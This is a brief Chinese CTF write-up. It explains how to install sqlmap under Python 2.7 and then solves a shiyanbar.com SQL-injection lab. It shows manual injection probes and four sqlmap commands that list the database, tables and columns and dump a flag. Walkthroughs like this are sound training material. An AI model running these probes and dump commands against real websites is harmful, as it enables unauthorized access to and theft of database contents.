一、sqlmap安装
windows平台,需安装python2版本(一般是2.7或2.8,3.5版本的不支持sqlmap)
SqlMap下载地址:sqlmap下载可下载到最新版本的SqlMap;
Python下载地址:python2.7可下载到相应的Python.建议下载2.7或者2.8版本的python,配合1中的sqlmap
安装完成后,进入sqlmap的安装目录,输入命令,查看安装版本,若正确安装,则会显示1.2.7.4#dev
D:\Python27\python.exe sqlmap.py --version
因为我电脑默认安装的python是3.5版本的,所以这里调用sqlmap需要指定python的安装路径。
二、sqlmap使用
题目:http://www.shiyanbar.com/ctf/33
这题主要是学习sqlmap的使用。
首先判断有没有sql注入
1.在网址后加' ,报错
2.在网址后加and 1=1,无报错
3.在网址后加and1=2,有报错,判断有sql注入
然后使用sqlmap来查看数据库信息
1.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
2.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
3.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --column
4.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
解出flag:whatiMyD91dump